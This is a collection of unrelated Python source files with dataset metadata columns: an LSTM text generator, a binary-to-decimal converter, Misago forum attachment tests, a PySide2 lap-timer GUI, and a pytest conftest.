lstm2val, _, _, _, _ = lstm_layer2(lstm1val, initial_state=[state, state, state, state])
lstm2val = Dropout(0.2)(lstm2val)
lstm_layer3 = LSTM(latentdim, return_sequences=False, return_state=True)
lstm3val, _, _ = lstm_layer3(lstm2val, initial_state=[state, state])
lstm3val = Dropout(0.2)(lstm3val)
dense_layer = Dense(self.vocab.shape[0], activation="softmax")
output = dense_layer(lstm3val)
mdl = tf.keras.models.Model(inputs=[decinput, state], outputs=output)
mdl.compile(optimizer="adam", loss="categorical_crossentropy")
return mdl
def text_cleaner(self, s):
s = re.sub("\n"," ", re.sub("[,<>@#\'\")(]","", s))
s = re.sub("[.?%$0-9!&*+-/:;<=\[\]£]"," ", s)
s = re.sub("[^ a-zA-Z]","",s)
s = " ".join(np.vectorize(lambda s: s if len(s)<=3 else nltk.stem.WordNetLemmatizer().lemmatize(s))
(np.array(s.split())))
return s.lower()
def beamer(self, start, state, k, toplimit=10):
returnvals = collections.deque()
pred = self.model.predict([start, state])
if k==1:
returnvals.append(np.argmax(pred[0]))
return np.max(pred[0]), returnvals
else:
maxval, beamseq = None, None
topchoices = np.argsort(pred[0])[-toplimit:]
for j in topchoices:
chars = start.copy()
chars[0,:-1] = chars[0,1:]
chars[0,-1] = j
val, shortseq = self.beamer(chars, state, k-1)
if (not maxval) or ((val*pred[0,j])>maxval):
maxval = val*pred[0,j]
beamseq = shortseq
beamseq.appendleft(j)
return maxval, beamseq
| <filename>BBC-news-data/software-stack/model.py
import tensorflow as tf
import tensorflow_hub as hub
import numpy as np
import os
import re
from tensorflow.keras.layers import LSTM, TimeDistributed, Dense, Bidirectional, Input, Embedding
from tensorflow.keras.layers import Dropout, Conv1D, Flatten
from tensorflow.keras.layers import Concatenate, Dot, Activation
import collections
import nltk.stem
class Model():
## FIRST-ORDER FUNCTIONS
def __init__(self, modelpath="../data/newspred.h5", usepath="./universal-sentence-encoder_4"):
self.embed = hub.load(usepath)
self.vocab = np.array([char for char in " abcdefghijklmnopqrstuvwxyz"])
self.model = self.model_maker()
self.model.load_weights(modelpath)
def generate(self, text, numwords, k=3):
text = self.text_cleaner(text)
if (len(text)<100): return None, None, False
state = self.embed([text]).numpy()
start = np.zeros((1,100))
start[0] = [np.where(self.vocab==r)[0][0] for r in text[:100]]
stim, seq = text[:100], ""
wordsgen = 0
while (wordsgen<numwords):
maxval, beamseq = self.beamer(start.copy(), state.copy(), k)
seq+="".join([self.vocab[np.int(i)] for i in beamseq])
start[0,:-k] = start[0,k:]
start[0,-k:] = beamseq
wordsgen+=np.sum(np.array(beamseq)==0)
#Incase we overshoot numwords with numerous words in a single beam
seq = " ".join(seq.split()[:wordsgen])
return stim, seq, True
## SECOND-ORDER FUNCTONS
def model_maker(self, latentdim=512):
tf.keras.backend.clear_session()
state = Input(shape=(latentdim,))
decinput = Input(shape=(100,))
embed_layer = Embedding(self.vocab.shape[0], self.vocab.shape[0], weights=[np.eye(self.vocab.shape[0])],
trainable=False, input_length=100)
embedval = embed_layer(decinput)
lstm_layer1 = LSTM(latentdim, return_sequences=True, return_state=True)
lstm1val, _, _ = lstm_layer1(embedval, initial_state=[state, state])
lstm1val = Dropout(0.2)(lstm1val)
lstm_layer2 = Bidirectional(LSTM(latentdim, return_sequences=True, return_state=True))
lstm2val, _, _, _, _ = lstm_layer2(lstm1val, initial_state=[state, state, state, state])
lstm2val = Dropout(0.2)(lstm2val)
lstm_layer3 = LSTM(latentdim, return_sequences=False, return_state=True)
lstm3val, _, _ = lstm_layer3(lstm2val, initial_state=[state, state])
lstm3val = Dropout(0.2)(lstm3val)
dense_layer = Dense(self.vocab.shape[0], activation="softmax")
output = dense_layer(lstm3val)
mdl = tf.keras.models.Model(inputs=[decinput, state], outputs=output)
mdl.compile(optimizer="adam", loss="categorical_crossentropy")
return mdl
def text_cleaner(self, s):
s = re.sub("\n"," ", re.sub("[,<>@#\'\")(]","", s))
s = re.sub("[.?%$0-9!&*+-/:;<=\[\]£]"," ", s)
s = re.sub("[^ a-zA-Z]","",s)
s = " ".join(np.vectorize(lambda s: s if len(s)<=3 else nltk.stem.WordNetLemmatizer().lemmatize(s))
(np.array(s.split())))
return s.lower()
def beamer(self, start, state, k, toplimit=10):
returnvals = collections.deque()
pred = self.model.predict([start, state])
if k==1:
returnvals.append(np.argmax(pred[0]))
return np.max(pred[0]), returnvals
else:
maxval, beamseq = None, None
topchoices = np.argsort(pred[0])[-toplimit:]
for j in topchoices:
chars = start.copy()
chars[0,:-1] = chars[0,1:]
chars[0,-1] = j
val, shortseq = self.beamer(chars, state, k-1)
if (not maxval) or ((val*pred[0,j])>maxval):
maxval = val*pred[0,j]
beamseq = shortseq
beamseq.appendleft(j)
return maxval, beamseq
| en | 0.683603 | ## FIRST-ORDER FUNCTIONS #Incase we overshoot numwords with numerous words in a single beam ## SECOND-ORDER FUNCTONS #\'\")(]","", s)) | 2.374935 | 2 |
binary_to_decimal_converter.py | Pablo-RodriguezOrtiz/Small-projects | 0 | 6612364 | # ------------------------------------------------------------------------
#
#
# Made with python 3.8.8
#
#
# ------------------------------------------------------------------------
def bdecimal():
x= input("Introduce el numero binario para convertirlo en decimal: ")
y= 0
posicion = len(x)-1
for i in x:
k = posicion
y = y + (int(i)*2**k)
posicion=posicion-1
return("Tu número en base decimal es "+str(y))
| # ------------------------------------------------------------------------
#
#
# Made with python 3.8.8
#
#
# ------------------------------------------------------------------------
def bdecimal():
x= input("Introduce el numero binario para convertirlo en decimal: ")
y= 0
posicion = len(x)-1
for i in x:
k = posicion
y = y + (int(i)*2**k)
posicion=posicion-1
return("Tu número en base decimal es "+str(y))
| en | 0.169009 | # ------------------------------------------------------------------------ # # # Made with python 3.8.8 # # # ------------------------------------------------------------------------ | 3.999164 | 4 |
misago/threads/tests/test_attachments_middleware.py | HenryChenV/iJiangNan | 1 | 6612365 | from rest_framework import serializers
from misago.acl.testutils import override_acl
from misago.categories.models import Category
from misago.conf import settings
from misago.threads import testutils
from misago.threads.api.postingendpoint import PostingEndpoint
from misago.threads.api.postingendpoint.attachments import (
AttachmentsMiddleware, validate_attachments_count)
from misago.threads.models import Attachment, AttachmentType
from misago.users.testutils import AuthenticatedUserTestCase
class RequestMock(object):
def __init__(self, data=None):
self.data = data or {}
class AttachmentsMiddlewareTests(AuthenticatedUserTestCase):
def setUp(self):
super(AttachmentsMiddlewareTests, self).setUp()
self.category = Category.objects.get(slug='first-category')
self.thread = testutils.post_thread(category=self.category)
self.post = self.thread.first_post
self.post.update_fields = []
self.override_acl()
self.filetype = AttachmentType.objects.order_by('id').last()
def override_acl(self, new_acl=None):
override_acl(self.user, new_acl or {'max_attachment_size': 1024})
def mock_attachment(self, user=True, post=None):
return Attachment.objects.create(
secret=Attachment.generate_new_secret(),
filetype=self.filetype,
post=post,
size=1000,
uploader=self.user if user else None,
uploader_name=self.user.username,
uploader_slug=self.user.slug,
uploader_ip='127.0.0.1',
filename='testfile_{}.zip'.format(Attachment.objects.count() + 1),
)
def test_use_this_middleware(self):
"""use_this_middleware returns False if we can't upload attachments"""
middleware = AttachmentsMiddleware(user=self.user)
self.override_acl({'max_attachment_size': 0})
self.assertFalse(middleware.use_this_middleware())
self.override_acl({'max_attachment_size': 1024})
self.assertTrue(middleware.use_this_middleware())
def test_middleware_is_optional(self):
"""middleware is optional"""
INPUTS = [{}, {'attachments': []}]
for test_input in INPUTS:
middleware = AttachmentsMiddleware(
request=RequestMock(test_input),
mode=PostingEndpoint.START,
user=self.user,
post=self.post,
)
serializer = middleware.get_serializer()
self.assertTrue(serializer.is_valid())
def test_middleware_validates_ids(self):
"""middleware validates attachments ids"""
INPUTS = ['none', ['a', 'b', 123], range(settings.MISAGO_POST_ATTACHMENTS_LIMIT + 1)]
for test_input in INPUTS:
middleware = AttachmentsMiddleware(
request=RequestMock({
'attachments': test_input
}),
mode=PostingEndpoint.START,
user=self.user,
post=self.post,
)
serializer = middleware.get_serializer()
self.assertFalse(serializer.is_valid(), "%r shouldn't validate" % test_input)
def test_get_initial_attachments(self):
"""get_initial_attachments returns list of attachments already existing on post"""
middleware = AttachmentsMiddleware(
request=RequestMock(),
mode=PostingEndpoint.EDIT,
user=self.user,
post=self.post,
)
serializer = middleware.get_serializer()
attachments = serializer.get_initial_attachments(
middleware.mode, middleware.user, middleware.post
)
self.assertEqual(attachments, [])
attachment = self.mock_attachment(post=self.post)
attachments = serializer.get_initial_attachments(
middleware.mode, middleware.user, middleware.post
)
self.assertEqual(attachments, [attachment])
def test_get_new_attachments(self):
"""get_initial_attachments returns list of attachments already existing on post"""
middleware = AttachmentsMiddleware(
request=RequestMock(),
mode=PostingEndpoint.EDIT,
user=self.user,
post=self.post,
)
serializer = middleware.get_serializer()
attachments = serializer.get_new_attachments(middleware.user, [1, 2, 3])
self.assertEqual(attachments, [])
attachment = self.mock_attachment()
attachments = serializer.get_new_attachments(middleware.user, [attachment.pk])
self.assertEqual(attachments, [attachment])
# only own orphaned attachments may be assigned to posts
other_user_attachment = self.mock_attachment(user=False)
attachments = serializer.get_new_attachments(middleware.user, [other_user_attachment.pk])
self.assertEqual(attachments, [])
def test_cant_delete_attachment(self):
"""middleware validates if we have permission to delete other users attachments"""
self.override_acl({
'max_attachment_size': 1024,
'can_delete_other_users_attachments': False,
})
attachment = self.mock_attachment(user=False, post=self.post)
self.assertIsNone(attachment.uploader)
serializer = AttachmentsMiddleware(
request=RequestMock({
'attachments': []
}),
mode=PostingEndpoint.EDIT,
user=self.user,
post=self.post,
).get_serializer()
self.assertFalse(serializer.is_valid())
def test_add_attachments(self):
"""middleware adds attachments to post"""
attachments = [
self.mock_attachment(),
self.mock_attachment(),
]
middleware = AttachmentsMiddleware(
request=RequestMock({
'attachments': [a.pk for a in attachments]
}),
mode=PostingEndpoint.EDIT,
user=self.user,
post=self.post,
)
serializer = middleware.get_serializer()
self.assertTrue(serializer.is_valid())
middleware.save(serializer)
# attachments were associated with post
self.assertEqual(self.post.update_fields, ['attachments_cache'])
self.assertEqual(self.post.attachment_set.count(), 2)
attachments_filenames = list(reversed([a.filename for a in attachments]))
self.assertEqual([a['filename'] for a in self.post.attachments_cache],
attachments_filenames)
def test_remove_attachments(self):
"""middleware removes attachment from post and db"""
attachments = [
self.mock_attachment(post=self.post),
self.mock_attachment(post=self.post),
]
middleware = AttachmentsMiddleware(
request=RequestMock({
'attachments': [attachments[0].pk]
}),
mode=PostingEndpoint.EDIT,
user=self.user,
post=self.post,
)
serializer = middleware.get_serializer()
self.assertTrue(serializer.is_valid())
middleware.save(serializer)
# attachments were associated with post
self.assertEqual(self.post.update_fields, ['attachments_cache'])
self.assertEqual(self.post.attachment_set.count(), 1)
self.assertEqual(Attachment.objects.count(), 1)
attachments_filenames = [attachments[0].filename]
self.assertEqual([a['filename'] for a in self.post.attachments_cache],
attachments_filenames)
def test_steal_attachments(self):
"""middleware validates if attachments are already assigned to other posts"""
other_post = testutils.reply_thread(self.thread)
attachments = [
self.mock_attachment(post=other_post),
self.mock_attachment(),
]
middleware = AttachmentsMiddleware(
request=RequestMock({
'attachments': [attachments[0].pk, attachments[1].pk]
}),
mode=PostingEndpoint.EDIT,
user=self.user,
post=self.post,
)
serializer = middleware.get_serializer()
self.assertTrue(serializer.is_valid())
middleware.save(serializer)
# only unassociated attachment was associated with post
self.assertEqual(self.post.update_fields, ['attachments_cache'])
self.assertEqual(self.post.attachment_set.count(), 1)
self.assertEqual(Attachment.objects.get(pk=attachments[0].pk).post, other_post)
self.assertEqual(Attachment.objects.get(pk=attachments[1].pk).post, self.post)
def test_edit_attachments(self):
"""middleware removes and adds attachments to post"""
attachments = [
self.mock_attachment(post=self.post),
self.mock_attachment(post=self.post),
self.mock_attachment(),
]
middleware = AttachmentsMiddleware(
request=RequestMock({
'attachments': [attachments[0].pk, attachments[2].pk]
}),
mode=PostingEndpoint.EDIT,
user=self.user,
post=self.post,
)
serializer = middleware.get_serializer()
self.assertTrue(serializer.is_valid())
middleware.save(serializer)
# attachments were associated with post
self.assertEqual(self.post.update_fields, ['attachments_cache'])
self.assertEqual(self.post.attachment_set.count(), 2)
attachments_filenames = [attachments[2].filename, attachments[0].filename]
self.assertEqual([a['filename'] for a in self.post.attachments_cache],
attachments_filenames)
class ValidateAttachmentsCountTests(AuthenticatedUserTestCase):
def test_validate_attachments_count(self):
"""too large count of attachments is rejected"""
validate_attachments_count(range(settings.MISAGO_POST_ATTACHMENTS_LIMIT))
with self.assertRaises(serializers.ValidationError):
validate_attachments_count(range(settings.MISAGO_POST_ATTACHMENTS_LIMIT + 1))
| from rest_framework import serializers
from misago.acl.testutils import override_acl
from misago.categories.models import Category
from misago.conf import settings
from misago.threads import testutils
from misago.threads.api.postingendpoint import PostingEndpoint
from misago.threads.api.postingendpoint.attachments import (
AttachmentsMiddleware, validate_attachments_count)
from misago.threads.models import Attachment, AttachmentType
from misago.users.testutils import AuthenticatedUserTestCase
class RequestMock(object):
def __init__(self, data=None):
self.data = data or {}
class AttachmentsMiddlewareTests(AuthenticatedUserTestCase):
def setUp(self):
super(AttachmentsMiddlewareTests, self).setUp()
self.category = Category.objects.get(slug='first-category')
self.thread = testutils.post_thread(category=self.category)
self.post = self.thread.first_post
self.post.update_fields = []
self.override_acl()
self.filetype = AttachmentType.objects.order_by('id').last()
def override_acl(self, new_acl=None):
override_acl(self.user, new_acl or {'max_attachment_size': 1024})
def mock_attachment(self, user=True, post=None):
return Attachment.objects.create(
secret=Attachment.generate_new_secret(),
filetype=self.filetype,
post=post,
size=1000,
uploader=self.user if user else None,
uploader_name=self.user.username,
uploader_slug=self.user.slug,
uploader_ip='127.0.0.1',
filename='testfile_{}.zip'.format(Attachment.objects.count() + 1),
)
def test_use_this_middleware(self):
"""use_this_middleware returns False if we can't upload attachments"""
middleware = AttachmentsMiddleware(user=self.user)
self.override_acl({'max_attachment_size': 0})
self.assertFalse(middleware.use_this_middleware())
self.override_acl({'max_attachment_size': 1024})
self.assertTrue(middleware.use_this_middleware())
def test_middleware_is_optional(self):
"""middleware is optional"""
INPUTS = [{}, {'attachments': []}]
for test_input in INPUTS:
middleware = AttachmentsMiddleware(
request=RequestMock(test_input),
mode=PostingEndpoint.START,
user=self.user,
post=self.post,
)
serializer = middleware.get_serializer()
self.assertTrue(serializer.is_valid())
def test_middleware_validates_ids(self):
"""middleware validates attachments ids"""
INPUTS = ['none', ['a', 'b', 123], range(settings.MISAGO_POST_ATTACHMENTS_LIMIT + 1)]
for test_input in INPUTS:
middleware = AttachmentsMiddleware(
request=RequestMock({
'attachments': test_input
}),
mode=PostingEndpoint.START,
user=self.user,
post=self.post,
)
serializer = middleware.get_serializer()
self.assertFalse(serializer.is_valid(), "%r shouldn't validate" % test_input)
def test_get_initial_attachments(self):
"""get_initial_attachments returns list of attachments already existing on post"""
middleware = AttachmentsMiddleware(
request=RequestMock(),
mode=PostingEndpoint.EDIT,
user=self.user,
post=self.post,
)
serializer = middleware.get_serializer()
attachments = serializer.get_initial_attachments(
middleware.mode, middleware.user, middleware.post
)
self.assertEqual(attachments, [])
attachment = self.mock_attachment(post=self.post)
attachments = serializer.get_initial_attachments(
middleware.mode, middleware.user, middleware.post
)
self.assertEqual(attachments, [attachment])
def test_get_new_attachments(self):
"""get_initial_attachments returns list of attachments already existing on post"""
middleware = AttachmentsMiddleware(
request=RequestMock(),
mode=PostingEndpoint.EDIT,
user=self.user,
post=self.post,
)
serializer = middleware.get_serializer()
attachments = serializer.get_new_attachments(middleware.user, [1, 2, 3])
self.assertEqual(attachments, [])
attachment = self.mock_attachment()
attachments = serializer.get_new_attachments(middleware.user, [attachment.pk])
self.assertEqual(attachments, [attachment])
# only own orphaned attachments may be assigned to posts
other_user_attachment = self.mock_attachment(user=False)
attachments = serializer.get_new_attachments(middleware.user, [other_user_attachment.pk])
self.assertEqual(attachments, [])
def test_cant_delete_attachment(self):
"""middleware validates if we have permission to delete other users attachments"""
self.override_acl({
'max_attachment_size': 1024,
'can_delete_other_users_attachments': False,
})
attachment = self.mock_attachment(user=False, post=self.post)
self.assertIsNone(attachment.uploader)
serializer = AttachmentsMiddleware(
request=RequestMock({
'attachments': []
}),
mode=PostingEndpoint.EDIT,
user=self.user,
post=self.post,
).get_serializer()
self.assertFalse(serializer.is_valid())
def test_add_attachments(self):
"""middleware adds attachments to post"""
attachments = [
self.mock_attachment(),
self.mock_attachment(),
]
middleware = AttachmentsMiddleware(
request=RequestMock({
'attachments': [a.pk for a in attachments]
}),
mode=PostingEndpoint.EDIT,
user=self.user,
post=self.post,
)
serializer = middleware.get_serializer()
self.assertTrue(serializer.is_valid())
middleware.save(serializer)
# attachments were associated with post
self.assertEqual(self.post.update_fields, ['attachments_cache'])
self.assertEqual(self.post.attachment_set.count(), 2)
attachments_filenames = list(reversed([a.filename for a in attachments]))
self.assertEqual([a['filename'] for a in self.post.attachments_cache],
attachments_filenames)
def test_remove_attachments(self):
"""middleware removes attachment from post and db"""
attachments = [
self.mock_attachment(post=self.post),
self.mock_attachment(post=self.post),
]
middleware = AttachmentsMiddleware(
request=RequestMock({
'attachments': [attachments[0].pk]
}),
mode=PostingEndpoint.EDIT,
user=self.user,
post=self.post,
)
serializer = middleware.get_serializer()
self.assertTrue(serializer.is_valid())
middleware.save(serializer)
# attachments were associated with post
self.assertEqual(self.post.update_fields, ['attachments_cache'])
self.assertEqual(self.post.attachment_set.count(), 1)
self.assertEqual(Attachment.objects.count(), 1)
attachments_filenames = [attachments[0].filename]
self.assertEqual([a['filename'] for a in self.post.attachments_cache],
attachments_filenames)
def test_steal_attachments(self):
"""middleware validates if attachments are already assigned to other posts"""
other_post = testutils.reply_thread(self.thread)
attachments = [
self.mock_attachment(post=other_post),
self.mock_attachment(),
]
middleware = AttachmentsMiddleware(
request=RequestMock({
'attachments': [attachments[0].pk, attachments[1].pk]
}),
mode=PostingEndpoint.EDIT,
user=self.user,
post=self.post,
)
serializer = middleware.get_serializer()
self.assertTrue(serializer.is_valid())
middleware.save(serializer)
# only unassociated attachment was associated with post
self.assertEqual(self.post.update_fields, ['attachments_cache'])
self.assertEqual(self.post.attachment_set.count(), 1)
self.assertEqual(Attachment.objects.get(pk=attachments[0].pk).post, other_post)
self.assertEqual(Attachment.objects.get(pk=attachments[1].pk).post, self.post)
def test_edit_attachments(self):
"""middleware removes and adds attachments to post"""
attachments = [
self.mock_attachment(post=self.post),
self.mock_attachment(post=self.post),
self.mock_attachment(),
]
middleware = AttachmentsMiddleware(
request=RequestMock({
'attachments': [attachments[0].pk, attachments[2].pk]
}),
mode=PostingEndpoint.EDIT,
user=self.user,
post=self.post,
)
serializer = middleware.get_serializer()
self.assertTrue(serializer.is_valid())
middleware.save(serializer)
# attachments were associated with post
self.assertEqual(self.post.update_fields, ['attachments_cache'])
self.assertEqual(self.post.attachment_set.count(), 2)
attachments_filenames = [attachments[2].filename, attachments[0].filename]
self.assertEqual([a['filename'] for a in self.post.attachments_cache],
attachments_filenames)
class ValidateAttachmentsCountTests(AuthenticatedUserTestCase):
def test_validate_attachments_count(self):
"""too large count of attachments is rejected"""
validate_attachments_count(range(settings.MISAGO_POST_ATTACHMENTS_LIMIT))
with self.assertRaises(serializers.ValidationError):
validate_attachments_count(range(settings.MISAGO_POST_ATTACHMENTS_LIMIT + 1))
| en | 0.958346 | use_this_middleware returns False if we can't upload attachments middleware is optional middleware validates attachments ids get_initial_attachments returns list of attachments already existing on post get_initial_attachments returns list of attachments already existing on post # only own orphaned attachments may be assigned to posts middleware validates if we have permission to delete other users attachments middleware adds attachments to post # attachments were associated with post middleware removes attachment from post and db # attachments were associated with post middleware validates if attachments are already assigned to other posts # only unassociated attachment was associated with post middleware removes and adds attachments to post # attachments were associated with post too large count of attachments is rejected | 2.024463 | 2 |
MainGUI.py | JamesxL/TrackLogger | 0 | 6612366 | <gh_stars>0
from PySide2.QtCore import * # type: ignore
from PySide2.QtGui import * # type: ignore
from PySide2.QtWidgets import * # type: ignore
import sys
import os
from Drivers.OmeTracker import OmeTracker
import numpy as np
import datetime
import time
import csv
from GUI.MainScreen import Ui_MainWindow as MainGUI
from GUI.ConfigPop import Ui_ConfigPop as ConfigGUI
class MainWindow(QMainWindow, MainGUI):
def __init__(self) -> None:
super().__init__()
self.setupUi(self)
self.system = os.uname().nodename
self.Tracker = OmeTracker()
# set up subwindows/popups
self.ConfigWindow = ConfigWindow()
# set up bottons
self.StartTimerBtn.clicked.connect(self.StartTiming)
self.StopTimerBtn.clicked.connect(self.StopTiming)
self.ConfigBtn.clicked.connect(self.OpenConfig)
self.ClockUpdater = QTimer(self)
self.ClockUpdater.timeout.connect(self.UpdateClock)
self.ClockUpdater.setInterval(20)
self.ClockUpdater.start()
self.SensorUpdater = QTimer(self)
self.SensorUpdater.timeout.connect(self.UpdateSensor)
self.SensorUpdater.start(100)
self.RunMode = 'circuit'
self.ModeRunner = QTimer(self)
self.ModeRunner.setInterval(5)
self.ConfigureRunMode()
self.Tracker.start_sys_logging()
self.StartTiming()
if self.system == 'raspberrypi':
self.showFullScreen()
else:
self.show()
# self.StartTiming()
# self.showMaximized()
# self.showFullScreen()
def StartTiming(self):
self.Tracker.O_Timer.start_timer()
self.ModeRunner.start()
def StopTiming(self):
self.Tracker.O_Timer.stop_timer()
self.ModeRunner.stop()
def ConfigureRunMode(self, mode='circuit'):
if mode == 'circuit':
self.ModeRunner.timeout.connect(self.Tracker.lapping_mode)
pass
def UpdateClock(self):
_lap_time,_,_,_last_lap_time = self.Tracker.O_Timer.get_all_times()
if _lap_time != 0:
_formatted_time1 = str(datetime.timedelta(
seconds=_lap_time))[:-4]
else:
_formatted_time1 = '0:00:00.000'
self.LapTimeLbl.setText(_formatted_time1)
if self.Tracker.O_Timer.is_new_lap:
_formatted_time2 = str(datetime.timedelta(
seconds=_last_lap_time))[:-4]
self.LapRecordList.insertItem(0, _formatted_time2)
self.Tracker.O_Timer.is_new_lap_data = False
def UpdateGPSBtn(self, style=(255, 255, 255), text='GPS'):
self.GPSStatusBtn.setStyleSheet(style)
self.GPSStatusBtn.setText(text)
def UpdateCANBtn(self, style=(255, 255, 255), text='CAN'):
self.CANStatusBtn.setStyleSheet(style)
self.CANStatusBtn.setText(text)
def UpdateLogBtn(self, style=u"background-color: rgb(255, 255, 255);", text='Log'):
self.LoggerStatusBtn.setStyleSheet(style)
self.LoggerStatusBtn.setText(text)
def UpdateSensor(self):
_status = self.Tracker.get_sensor_status()
if not _status['GPS_connected']:
self.UpdateGPSBtn(u"background-color: rgb(100, 0, 0);", "NO GPS")
else:
_txt = 'GPS'
if not _status['GPS_ready']:
_txt = 'GGA'
self.UpdateGPSBtn(
u"background-color: rgb(180, 0, 0);", _txt)
else:
if (_status['GPS_mode'] == 0) | (_status['GPS_fix_quality'] == 0):
_txt = 'NO FIX'
self.UpdateGPSBtn(
u"background-color: rgb(255, 255, 0);", _txt)
else:
GPS_fix_modes = {'2': '2D', '3': '3D'}
GPS_fix_qual = {'1': '', '2': 'D'}
_txt = GPS_fix_modes.get(str(_status['GPS_mode'])) + GPS_fix_qual.get(str(_status['GPS_fix_quality']))+f":{_status['GPS_sat_count']}"
self.UpdateGPSBtn(
u"background-color: rgb(0, 255, 0);", _txt)
_spd = _status['groundspeed']
if _spd is not None:
_spd = "{:.1f}".format(_spd*2.23693629)
self.GPSspeed.setText(_spd)
else:
self.GPSspeed.setText('0.0')
if not _status['CAN_connected']:
self.UpdateCANBtn(u"background-color: rgb(100, 0, 0);", "NO CAN")
else:
if not _status['CAN_ready']:
self.UpdateGPSBtn(
u"background-color: rgb(180, 0, 0);", "NO COMM")
else:
self.UpdateGPSBtn(
u"background-color: rgb(0, 255, 0);", "CAN OK")
if (_status['Tracker_logging']):
self.UpdateLogBtn(u"background-color: rgb(0, 255, 0);", "Logging")
else:
self.UpdateLogBtn(text="NLOG")
def OpenConfig(self):
self.ConfigWindow.show()
def ExitProg(self):
self.Tracker.stop_sys_logging()
app.exit()
class ConfigWindow(QMainWindow, ConfigGUI):
def __init__(self):
super().__init__()
self.setupUi(self)
self.ExitBtn.clicked.connect(self.ExitProg)
self.ReturnBtn.clicked.connect(self.CloseDialog)
def CloseDialog(self):
self.close()
def ExitProg(self):
app.exit()
app = QApplication(sys.argv)
mainWin = MainWindow()
app.exit(app.exec_())
| from PySide2.QtCore import * # type: ignore
from PySide2.QtGui import * # type: ignore
from PySide2.QtWidgets import * # type: ignore
import sys
import os
from Drivers.OmeTracker import OmeTracker
import numpy as np
import datetime
import time
import csv
from GUI.MainScreen import Ui_MainWindow as MainGUI
from GUI.ConfigPop import Ui_ConfigPop as ConfigGUI
class MainWindow(QMainWindow, MainGUI):
def __init__(self) -> None:
super().__init__()
self.setupUi(self)
self.system = os.uname().nodename
self.Tracker = OmeTracker()
# set up subwindows/popups
self.ConfigWindow = ConfigWindow()
# set up bottons
self.StartTimerBtn.clicked.connect(self.StartTiming)
self.StopTimerBtn.clicked.connect(self.StopTiming)
self.ConfigBtn.clicked.connect(self.OpenConfig)
self.ClockUpdater = QTimer(self)
self.ClockUpdater.timeout.connect(self.UpdateClock)
self.ClockUpdater.setInterval(20)
self.ClockUpdater.start()
self.SensorUpdater = QTimer(self)
self.SensorUpdater.timeout.connect(self.UpdateSensor)
self.SensorUpdater.start(100)
self.RunMode = 'circuit'
self.ModeRunner = QTimer(self)
self.ModeRunner.setInterval(5)
self.ConfigureRunMode()
self.Tracker.start_sys_logging()
self.StartTiming()
if self.system == 'raspberrypi':
self.showFullScreen()
else:
self.show()
# self.StartTiming()
# self.showMaximized()
# self.showFullScreen()
def StartTiming(self):
self.Tracker.O_Timer.start_timer()
self.ModeRunner.start()
def StopTiming(self):
self.Tracker.O_Timer.stop_timer()
self.ModeRunner.stop()
def ConfigureRunMode(self, mode='circuit'):
if mode == 'circuit':
self.ModeRunner.timeout.connect(self.Tracker.lapping_mode)
pass
def UpdateClock(self):
_lap_time,_,_,_last_lap_time = self.Tracker.O_Timer.get_all_times()
if _lap_time != 0:
_formatted_time1 = str(datetime.timedelta(
seconds=_lap_time))[:-4]
else:
_formatted_time1 = '0:00:00.000'
self.LapTimeLbl.setText(_formatted_time1)
if self.Tracker.O_Timer.is_new_lap:
_formatted_time2 = str(datetime.timedelta(
seconds=_last_lap_time))[:-4]
self.LapRecordList.insertItem(0, _formatted_time2)
self.Tracker.O_Timer.is_new_lap_data = False
def UpdateGPSBtn(self, style=(255, 255, 255), text='GPS'):
self.GPSStatusBtn.setStyleSheet(style)
self.GPSStatusBtn.setText(text)
def UpdateCANBtn(self, style=(255, 255, 255), text='CAN'):
self.CANStatusBtn.setStyleSheet(style)
self.CANStatusBtn.setText(text)
def UpdateLogBtn(self, style=u"background-color: rgb(255, 255, 255);", text='Log'):
self.LoggerStatusBtn.setStyleSheet(style)
self.LoggerStatusBtn.setText(text)
def UpdateSensor(self):
_status = self.Tracker.get_sensor_status()
if not _status['GPS_connected']:
self.UpdateGPSBtn(u"background-color: rgb(100, 0, 0);", "NO GPS")
else:
_txt = 'GPS'
if not _status['GPS_ready']:
_txt = 'GGA'
self.UpdateGPSBtn(
u"background-color: rgb(180, 0, 0);", _txt)
else:
if (_status['GPS_mode'] == 0) | (_status['GPS_fix_quality'] == 0):
_txt = 'NO FIX'
self.UpdateGPSBtn(
u"background-color: rgb(255, 255, 0);", _txt)
else:
GPS_fix_modes = {'2': '2D', '3': '3D'}
GPS_fix_qual = {'1': '', '2': 'D'}
_txt = GPS_fix_modes.get(str(_status['GPS_mode'])) + GPS_fix_qual.get(str(_status['GPS_fix_quality']))+f":{_status['GPS_sat_count']}"
self.UpdateGPSBtn(
u"background-color: rgb(0, 255, 0);", _txt)
_spd = _status['groundspeed']
if _spd is not None:
_spd = "{:.1f}".format(_spd*2.23693629)
self.GPSspeed.setText(_spd)
else:
self.GPSspeed.setText('0.0')
if not _status['CAN_connected']:
self.UpdateCANBtn(u"background-color: rgb(100, 0, 0);", "NO CAN")
else:
if not _status['CAN_ready']:
self.UpdateGPSBtn(
u"background-color: rgb(180, 0, 0);", "NO COMM")
else:
self.UpdateGPSBtn(
u"background-color: rgb(0, 255, 0);", "CAN OK")
if (_status['Tracker_logging']):
self.UpdateLogBtn(u"background-color: rgb(0, 255, 0);", "Logging")
else:
self.UpdateLogBtn(text="NLOG")
def OpenConfig(self):
self.ConfigWindow.show()
def ExitProg(self):
self.Tracker.stop_sys_logging()
app.exit()
class ConfigWindow(QMainWindow, ConfigGUI):
def __init__(self):
super().__init__()
self.setupUi(self)
self.ExitBtn.clicked.connect(self.ExitProg)
self.ReturnBtn.clicked.connect(self.CloseDialog)
def CloseDialog(self):
self.close()
def ExitProg(self):
app.exit()
app = QApplication(sys.argv)
mainWin = MainWindow()
app.exit(app.exec_()) | en | 0.275428 | # type: ignore # type: ignore # type: ignore # set up subwindows/popups # set up bottons # self.StartTiming() # self.showMaximized() # self.showFullScreen() | 2.186291 | 2 |
tests/conftest.py | vemek/dosage | 0 | 6612367 | # SPDX-License-Identifier: MIT
# Copyright (C) 2019-2022 <NAME>
import time
from pathlib import Path
import pytest
@pytest.fixture()
def _nosleep(monkeypatch):
def sleep(seconds):
pass
monkeypatch.setattr(time, 'sleep', sleep)
@pytest.fixture()
def _noappdirs(monkeypatch):
monkeypatch.setattr('dosagelib.cmd.user_plugin_path', Path(__file__).parent / 'mocks' / 'plugins')
| # SPDX-License-Identifier: MIT
# Copyright (C) 2019-2022 <NAME>
import time
from pathlib import Path
import pytest
@pytest.fixture()
def _nosleep(monkeypatch):
def sleep(seconds):
pass
monkeypatch.setattr(time, 'sleep', sleep)
@pytest.fixture()
def _noappdirs(monkeypatch):
monkeypatch.setattr('dosagelib.cmd.user_plugin_path', Path(__file__).parent / 'mocks' / 'plugins')
